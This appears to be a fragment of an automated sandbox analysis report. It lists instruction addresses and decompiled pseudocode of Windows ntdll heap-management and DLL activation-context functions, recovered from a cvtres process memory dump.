                                                                        0x055ca885
                                                                        0x055ca885
                                                                        0x055ca88b
                                                                        0x055ca890
                                                                        0x055ca896
                                                                        0x055cab0c
                                                                        0x055cab0f
                                                                        0x055cab15
                                                                        0x05612320
                                                                        0x05612320
                                                                        0x055cab1b
                                                                        0x055ca89c
                                                                        0x055ca89f
                                                                        0x055ca8a2
                                                                        0x055ca8a2
                                                                        0x055ca8a5
                                                                        0x055ca8af
                                                                        0x055ca8b3
                                                                        0x055ca8b8
                                                                        0x055caa66
                                                                        0x055ca8be
                                                                        0x055ca8c5
                                                                        0x055ca8c6
                                                                        0x055ca8ce
                                                                        0x05612328
                                                                        0x05612332
                                                                        0x05612337
                                                                        0x05612337
                                                                        0x055ca8ce
                                                                        0x055ca8d4
                                                                        0x055ca8d8
                                                                        0x055ca8db
                                                                        0x055ca8de
                                                                        0x055ca8e1
                                                                        0x055ca8e5
                                                                        0x055ca8e8
                                                                        0x055ca8f0
                                                                        0x055ca8f3
                                                                        0x0561234c
                                                                        0x05612350
                                                                        0x05612355
                                                                        0x05612359
                                                                        0x05612359
                                                                        0x055ca8f9
                                                                        0x055ca901
                                                                        0x055caae4
                                                                        0x055caae4
                                                                        0x055caaea
                                                                        0x00000000
                                                                        0x055ca907
                                                                        0x055ca90a
                                                                        0x055ca91d
                                                                        0x055ca91d
                                                                        0x00000000
                                                                        0x055ca910
                                                                        0x055ca910
                                                                        0x055ca910
                                                                        0x055ca914
                                                                        0x055ca924
                                                                        0x055ca924
                                                                        0x055ca924
                                                                        0x055ca924
                                                                        0x055ca916
                                                                        0x055ca91b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca91b
                                                                        0x055ca925
                                                                        0x055ca925
                                                                        0x055ca932
                                                                        0x055ca936
                                                                        0x055ca93c
                                                                        0x055ca93c
                                                                        0x055ca93c
                                                                        0x055cab22
                                                                        0x055cab24
                                                                        0x055cab27
                                                                        0x055cab27
                                                                        0x055ca942
                                                                        0x055ca944
                                                                        0x055caaba
                                                                        0x055caabd
                                                                        0x055caac0
                                                                        0x055caac0
                                                                        0x055caac2
                                                                        0x055cab2f
                                                                        0x055caac4
                                                                        0x055caac4
                                                                        0x055caac7
                                                                        0x055caaca
                                                                        0x055caacc
                                                                        0x055caace
                                                                        0x055caace
                                                                        0x055caace
                                                                        0x055caad1
                                                                        0x055caad1
                                                                        0x055caad7
                                                                        0x055caad9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612361
                                                                        0x05612369
                                                                        0x0561236b
                                                                        0x00000000
                                                                        0x05612371
                                                                        0x00000000
                                                                        0x05612371
                                                                        0x00000000
                                                                        0x0561236b
                                                                        0x055caac0
                                                                        0x055ca94a
                                                                        0x055ca94a
                                                                        0x055ca94d
                                                                        0x055ca94d
                                                                        0x055ca950
                                                                        0x055ca954
                                                                        0x05612376
                                                                        0x05612380
                                                                        0x055ca95a
                                                                        0x055ca95a
                                                                        0x055ca95c
                                                                        0x055ca95f
                                                                        0x055ca961
                                                                        0x055ca961
                                                                        0x055ca967
                                                                        0x055ca96a
                                                                        0x055ca972
                                                                        0x055caa02
                                                                        0x055caa06
                                                                        0x055caa10
                                                                        0x055caa16
                                                                        0x055caa16
                                                                        0x055caa1b
                                                                        0x055caa21
                                                                        0x055caa24
                                                                        0x055caa27
                                                                        0x055caa29
                                                                        0x055caa2c
                                                                        0x055caa32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca978
                                                                        0x055ca978
                                                                        0x055ca97b
                                                                        0x055ca981
                                                                        0x055ca996
                                                                        0x055ca998
                                                                        0x055ca99f
                                                                        0x055ca9a2
                                                                        0x0561238a
                                                                        0x055ca9a8
                                                                        0x055ca9a8
                                                                        0x055ca9a8
                                                                        0x055ca9aa
                                                                        0x055ca9ad
                                                                        0x055ca9b0
                                                                        0x055ca9bb
                                                                        0x055ca9be
                                                                        0x055ca9c7
                                                                        0x055ca9c9
                                                                        0x055ca9c9
                                                                        0x055ca9cc
                                                                        0x055ca9d1
                                                                        0x055caa6d
                                                                        0x055caa70
                                                                        0x055caa73
                                                                        0x055caa75
                                                                        0x055caa79
                                                                        0x055caa7e
                                                                        0x055caa82
                                                                        0x055caa8f
                                                                        0x055caa94
                                                                        0x055caa96
                                                                        0x05612392
                                                                        0x056123a1
                                                                        0x056123a1
                                                                        0x055caa9c
                                                                        0x055caa9f
                                                                        0x055caaa2
                                                                        0x055caaa2
                                                                        0x055caaa8
                                                                        0x055caaab
                                                                        0x055caaaf
                                                                        0x00000000
                                                                        0x055caab5
                                                                        0x00000000
                                                                        0x055caab5
                                                                        0x055ca9d7
                                                                        0x055ca9d7
                                                                        0x055ca9da
                                                                        0x055ca9e0
                                                                        0x055ca9e3
                                                                        0x055ca9e6
                                                                        0x055ca9e9
                                                                        0x055ca9eb
                                                                        0x055ca9fd
                                                                        0x055ca9fd
                                                                        0x00000000
                                                                        0x055ca9eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ca983
                                                                        0x055ca983
                                                                        0x055ca983
                                                                        0x055ca987
                                                                        0x055ca995
                                                                        0x055ca995
                                                                        0x055ca995
                                                                        0x055ca995
                                                                        0x055ca989
                                                                        0x055ca98e
                                                                        0x00000000
                                                                        0x055ca990
                                                                        0x00000000
                                                                        0x055ca990
                                                                        0x055ca98e
                                                                        0x00000000
                                                                        0x055ca983
                                                                        0x055ca972
                                                                        0x055ca90a
                                                                        0x055caa34
                                                                        0x055caa34
                                                                        0x055caa40
                                                                        0x055caa43
                                                                        0x055caa46
                                                                        0x055caa4d
                                                                        0x056123ab
                                                                        0x056123b2
                                                                        0x056123b8
                                                                        0x056123be
                                                                        0x056123c3
                                                                        0x056123c5
                                                                        0x056123cb
                                                                        0x056123d1
                                                                        0x056123d5
                                                                        0x056123f6
                                                                        0x056123fb
                                                                        0x056123d7
                                                                        0x056123ec
                                                                        0x056123f1
                                                                        0x05612403
                                                                        0x05612408
                                                                        0x05612410
                                                                        0x05612417
                                                                        0x05612422
                                                                        0x05612422
                                                                        0x05612417
                                                                        0x056123c5
                                                                        0x056123b2
                                                                        0x00000000

                                                                        Strings
                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 056122F3
                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 05612403
                                                                        • HEAP: , xrefs: 056122E6, 056123F6
                                                                        • HEAP[%wZ]: , xrefs: 056122D7, 056123E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                        • API String ID: 0-1657114761
                                                                        • Opcode ID: dd09addc0e8976423b4ae2c9994893c2fc9fc63274f8bf6609c84d932a0826bb
                                                                        • Instruction ID: 32117114f367e4281eb797639881aade83b65cc716df273b8ee612bc33d25e3e
                                                                        • Opcode Fuzzy Hash: dd09addc0e8976423b4ae2c9994893c2fc9fc63274f8bf6609c84d932a0826bb
                                                                        • Instruction Fuzzy Hash: F2D1AF34A046499FDB18CFA8C491BBABFF2FF48300F1585ADD85A9B741E734A941CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E055CA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E055CDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E055E9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0566A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E055E9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E055AB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E055C7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0566138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E055C7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E055C7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E05661582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E055C7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E055C7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E05661582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E055FD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                        0x055ca229
                                                                        0x055ca231
                                                                        0x055ca23f
                                                                        0x055ca242
                                                                        0x055ca244
                                                                        0x055ca24c
                                                                        0x055ca255
                                                                        0x055ca25a
                                                                        0x055ca25f
                                                                        0x05611c76
                                                                        0x05611c78
                                                                        0x05611c7e
                                                                        0x05611c7f
                                                                        0x05611c81
                                                                        0x05611c82
                                                                        0x05611c84
                                                                        0x05611c89
                                                                        0x05611c8b
                                                                        0x05611c9e
                                                                        0x05611c9e
                                                                        0x05611cab
                                                                        0x05611cb2
                                                                        0x00000000
                                                                        0x05611cb2
                                                                        0x05611c8d
                                                                        0x05611c92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611c94
                                                                        0x05611c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05611c98
                                                                        0x055ca265
                                                                        0x055ca265
                                                                        0x055ca266
                                                                        0x055ca26f
                                                                        0x055ca270
                                                                        0x055ca276
                                                                        0x055ca277
                                                                        0x055ca279
                                                                        0x055ca27e
                                                                        0x055ca282
                                                                        0x05611db5
                                                                        0x05611dbb
                                                                        0x05611dc1
                                                                        0x05611dc5
                                                                        0x05611de4
                                                                        0x05611de9
                                                                        0x05611dc7
                                                                        0x05611ddc
                                                                        0x05611de1
                                                                        0x05611def
                                                                        0x05611df3
                                                                        0x05611df7
                                                                        0x05611dfe
                                                                        0x05611e06
                                                                        0x055ca302
                                                                        0x055ca308
                                                                        0x055ca308
                                                                        0x055ca288
                                                                        0x055ca28d
                                                                        0x055ca294
                                                                        0x05611cc1
                                                                        0x055ca29a
                                                                        0x055ca29a
                                                                        0x055ca29a
                                                                        0x055ca29f
                                                                        0x05611ccb
                                                                        0x05611cd1
                                                                        0x05611cd8
                                                                        0x05611cea
                                                                        0x05611cea
                                                                        0x05611cd8
                                                                        0x055ca2a9
                                                                        0x055ca2af
                                                                        0x055ca2bc
                                                                        0x05611cfd
                                                                        0x055ca2c2
                                                                        0x055ca2c2
                                                                        0x055ca2c2
                                                                        0x055ca2c7
                                                                        0x05611d07
                                                                        0x05611d0d
                                                                        0x05611d14
                                                                        0x05611d1f
                                                                        0x05611d21
                                                                        0x05611d2c
                                                                        0x05611d2c
                                                                        0x05611d2c
                                                                        0x05611d47
                                                                        0x05611d47
                                                                        0x05611d14
                                                                        0x055ca2cd
                                                                        0x055ca2d2
                                                                        0x055ca2d9
                                                                        0x05611d5a
                                                                        0x055ca2df
                                                                        0x055ca2df
                                                                        0x055ca2df
                                                                        0x055ca2e4
                                                                        0x05611d69
                                                                        0x05611d6b
                                                                        0x05611d76
                                                                        0x05611d76
                                                                        0x05611d76
                                                                        0x05611d91
                                                                        0x05611d91
                                                                        0x055ca2ea
                                                                        0x055ca2f0
                                                                        0x055ca2f5
                                                                        0x05611da8
                                                                        0x05611dad
                                                                        0x05611dad
                                                                        0x055ca2fd
                                                                        0x055ca300
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 2994545307-2586055223
                                                                        • Opcode ID: bffb6f32c870d143abc56d2e7cae796c6a07923f2cc4ad01534dbe2fe61e4888
                                                                        • Instruction ID: c8366ef8dad390b9d7f8d7a56b88e62060610b9b3d12c978c1ee5e60bbee58f3
                                                                        • Opcode Fuzzy Hash: bffb6f32c870d143abc56d2e7cae796c6a07923f2cc4ad01534dbe2fe61e4888
                                                                        • Instruction Fuzzy Hash: 825103723056859FD722DBA8C848F37BBE9FB85B50F0808A8F9528B691D734D940CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E055D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x569d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5698464; // 0x76d90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5695780 & 0x00000003) != 0) {
							E05625510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5695780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E055EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5697984; // 0x5072bb0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5698464; // 0x76d90110
					 *0x569b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E055D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5695780 & 0x00000005) != 0) {
						_push(_t49);
						E05625510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                        0x055d8e0f
                                                                        0x055d8e16
                                                                        0x055d8e19
                                                                        0x055d8e1b
                                                                        0x055d8e21
                                                                        0x055d8e7f
                                                                        0x055d8e85
                                                                        0x05619354
                                                                        0x0561936c
                                                                        0x05619371
                                                                        0x0561937b
                                                                        0x05619381
                                                                        0x05619381
                                                                        0x0561937b
                                                                        0x055d8e9d
                                                                        0x055d8e9d
                                                                        0x055d8e29
                                                                        0x055d8e2c
                                                                        0x055d8e38
                                                                        0x055d8e3e
                                                                        0x055d8e43
                                                                        0x055d8eb5
                                                                        0x055d8eb9
                                                                        0x056192aa
                                                                        0x056192af
                                                                        0x056192e8
                                                                        0x056192e8
                                                                        0x056192af
                                                                        0x055d8eb9
                                                                        0x055d8e45
                                                                        0x055d8e53
                                                                        0x055d8e5b
                                                                        0x055d8e5f
                                                                        0x055d8e78
                                                                        0x055d8e78
                                                                        0x055d8e7d
                                                                        0x055d8ec3
                                                                        0x055d8ecd
                                                                        0x055d8ed2
                                                                        0x055d8ed2
                                                                        0x055d8ec5
                                                                        0x055d8ec5
                                                                        0x00000000
                                                                        0x055d8e7d
                                                                        0x055d8e67
                                                                        0x055d8ea4
                                                                        0x0561931a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05619320
                                                                        0x055d8ea4
                                                                        0x055d8e70
                                                                        0x05619325
                                                                        0x05619340
                                                                        0x05619345
                                                                        0x05619345
                                                                        0x055d8e76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0561933B, 05619367
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0561932A
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 05619357
                                                                        • LdrpFindDllActivationContext, xrefs: 05619331, 0561935D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: 2f4deab649ce7d6ff72406bd600cedcfcb5085ec08b07c61f8f987f5bfc0bf2b
                                                                        • Instruction ID: 0f990483c1b0672e57dab4c810bb7df3332cddb01affcb096e4dabf241e0fc05
                                                                        • Opcode Fuzzy Hash: 2f4deab649ce7d6ff72406bd600cedcfcb5085ec08b07c61f8f987f5bfc0bf2b
                                                                        • Instruction Fuzzy Hash: 82412833A043159FDB35AA1CC88AF39F7BAFB05744F0A4529E80667150EB709D80CEE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056649A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 2994545307-336120773
                                                                        • Opcode ID: a6a75e388b50122b9d6de49b246d5a85e09e612a322b99a97dc809b8146d7930
                                                                        • Instruction ID: a7e935c1cbbdc3423e2f73b40cca3c851c1daff0d96f9b496a084d9a2a80dfd5
                                                                        • Opcode Fuzzy Hash: a6a75e388b50122b9d6de49b246d5a85e09e612a322b99a97dc809b8146d7930
                                                                        • Instruction Fuzzy Hash: 8A31013A200541FFCB10DBA8C8C9F6A73A9FF44622F244156F4069B744EE70A940DBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E055C99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0565FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0566A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E055FD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E055AB150();
										} else {
											E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E055AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x5696378 = 1;
											asm("int3");
											 *0x5696378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E055CA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E055CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
